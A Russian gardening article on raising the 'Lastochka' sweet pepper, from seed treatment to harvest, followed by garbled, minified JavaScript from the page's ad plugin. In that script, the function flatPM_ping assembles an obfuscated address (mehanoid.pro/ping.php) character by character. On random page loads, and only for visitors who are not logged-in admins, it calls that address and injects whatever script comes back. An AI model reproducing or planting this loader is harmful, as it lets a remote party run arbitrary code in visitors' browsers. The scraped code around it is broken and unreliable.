Посевной материал промойте под проточной водой и высушите. Чтобы избежать развития всяческих болезней зёрна обработайте – поместите в слабый раствор марганцовки (1 %), подержите в нём семена на протяжении 20 минут, после семена промойте. Данная процедура не только укрепит иммунитет и не допустит заражения в будущем, но и повысит устойчивость перца к неблагоприятным погодным явлениям.

Можно заранее прорастить семена – положить на влажную марлю, как только появятся ростки осуществить посадку.

Посев семян на рассаду

Подготовьте ёмкости и наполните их почвосмесью, сделайте маленькие ямки глубиной примерно 15 мм. В каждую поместите по 1 зерну, между растениями не должно быть менее 3-х см. Ласточка плохо переносит пикировку и пересадку, поэтому лучше высеивать зёрна непосредственно в отдельные горшочки.

Используйте торфяные таблетки, потом вместе с ними можно высадить рассаду перца в грунт.

Выращивание рассады

Если семена высеяли в большой ящик, то после формирования 2-х листов проведите пикировку. Для этого возьмите стаканчики (0,5 л) и пересадите в них по одному саженцу. Рассаду поставьте на солнечную сторону на подоконник.

Как только температура на улице поднимется до +15…+18 градусов – проведите закаливание. Оставьте саженцы на балконе на ночь. 1 раз в неделю поливайте растения тёплой водой. Спустя неделю внесите минеральные подкормки.

Высадка рассады в открытый грунт

Практически все садоводы основываются на внешнем виде рассады, как только ростки становятся сильными, на них появляется богатая зеленая масса — перец высаживают.

Растение пересаживают в открытую землю, когда на саженце появляются бутоны. В это время температура воздуха становится благоприятной, и растение начнет быстро развиваться. Перед непосредственной посадкой саженцев, грунт удобрите минеральными или органическими подкормками. Ласточка любит калий, поэтому лучше внесите данный элемент.

Рассаду высаживайте так, чтобы между саженцами оставалось расстояние не менее 0,4 м. Посадки сильно не углубляйте, сначала ямку залейте прохладной водой, а затем высадите ростки. Второй полив проводите только через неделю.

Чтобы влага меньше испарялась, укрывайте рассаду в жаркие дни, одновременно вы защитите листву от негативного воздействия солнечных лучей.

Уход и выращивание

По общим нормам уход за перцем Ласточка не особо отличается от ухода за другими овощными культурами. Он состоит из своевременного полива, рыхления, мульчирования и внесения подкормок.

Полив и подкормка

Поливайте растения только тёплой и отстоянной водой. Спустя неделю после посадки растения полив проводят каждые 4 дня. Также следите за сухостью поверхности почвы, не допускайте высыхания земляной корки. Более частые поливы осуществляйте на этапе плодоношения и цветения.

Если необходимо нарастить зелень у овощей, то используйте средство «Рост», можете заменить его мочевиной, растворенной в воде. Количество завязей можно увеличить при помощи стимулятора «Завязь». Общее самочувствие растения поможет улучшить «Эпин-экстра».

Формирование куста

Уход за растением в парнике состоит также из обрезки и формировании куста перца. Формирование проводят в несколько стеблей. Не допускайте чрезмерного загущения растения. Перец, обрезанный ранее, начнет приносить плоды раньше и обильнее.

Необходимо понимать, что формирование кроны перца зачастую приносит не только пользу, но и вред. Обрезка способствует возникновению риска появления у кустов вредителей и заболеваний.

Во время выращивания данного сорта следите за тем, чтобы кусты не перерастали, прищипните верхушку, когда посчитаете, что расти вверх ему уже не нужно. После этого процесса, растение начнет отращивать боковые ветви, на которых и будут располагаться плоды. Кроме этого срезайте нижние пасынки, в верхней части растения оставляйте только сильные и крепкие побеги с цветами.

Прополка и рыхление

Сорные растения приносят вред не только участку в целом, но и отдельным культурам в частности. Прополку и удаление сорняков следует проводить одновременно с рыхлением прикорневой зоны перца. Корневая система Ласточки находится близко к поверхности грунта, и повредить её просто. Рыхление проводите не слишком глубоко.

Сбор семян

Семена необходимы для будущего выращивания сорта. Сорвите полностью дозрелый плод, промойте его, разрежьте на пополам и достаньте зерна. Высушите их, они послужат отличным посадочным материалом в следующем году.

Сбор и хранение урожая

Стебли перца Листочка очень тонкие и хрупкие, повредить их не составит огромного труда. Чтобы этого избежать, плоды собирайте аккуратно и внимательно. Урожай начинайте снимать с начала плодоношения, и проводить сбор можно ежедневно, всё зависит от количества растений, прорастающих на вашем участке и от фазы их зрелости.

Если погодные условия будут благосклонными, то есть с тёплой безветренной погодой и не длительными дождевыми осадками, то в течение всего сезона можно получить примерно 6 кг сладкого перца с 1 кв. м.

Сорт Ласточка – классический ранний сорт, очень популярный среди огородников. Как он выглядит можно посмотреть в этом видео:

Как повысить урожайность?

Максимально высокий урожай перца можно получить, пользуясь рекомендациями опытных дачников, вот некоторые из них:

  • Опоры, к которым будет привязываться рассада, поместите в землю еще до высадки растений, таким образом во время вкапывания кольев в грунт не повредите корневую систему перца.
  • Перец обожает влагу, но во время обильных и длительных дождей накрывайте ростки плёнкой, иначе он начнет гнить.
  • Переувлажненность корневой системы принесет только вред, в первую очередь, это отразится на риске появления всяческих заболеваний.
  • Первые цветки, которые появятся на верхней развилке веток, удалите.
  • Первый урожай соберите на этапе технической зрелости, а остальной по желанию.
  • Не забывайте про необходимость формирования куста.
  • Храните плоды в холодильнике не дольше месяца, лучше замораживайте, а не консервируйте.
  • Если грунт питателен и вносить определенные подкормки надобности нет, то посыпьте прикорневой круг перца золой, она не только является удобрением, но и защитит кусты от болезней и вредителей.

Болезни и вредители

Сорт перца Ласточка обладает крепким иммунитетом, он не поддается влиянию заболеваний. Крепкое здоровье помогает противостоять даже фитофторозу и вертициллезному увяданию. Ласточка редко страдает от вредителей, таких как тля, паутинный клещ и слизни.

Профилактически меры состоят из регулярного убора сорной травы с участка, так как большая часть спор болезней находится на таких вредных растениях. Предотвратить заражения также можно при помощи обеззараживания зёрен и почвы для посадки перца Ласточка.

Отзывы о перце Ласточка

Сорт перца Ласточка – один из лучших представителей данной культуры, он не нуждается в особом уходе. Большое количество плодов обеспечит огородника таким урожаем, что он сможет воплотить в жизнь все свои задумки по поводу использования данного овоща.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};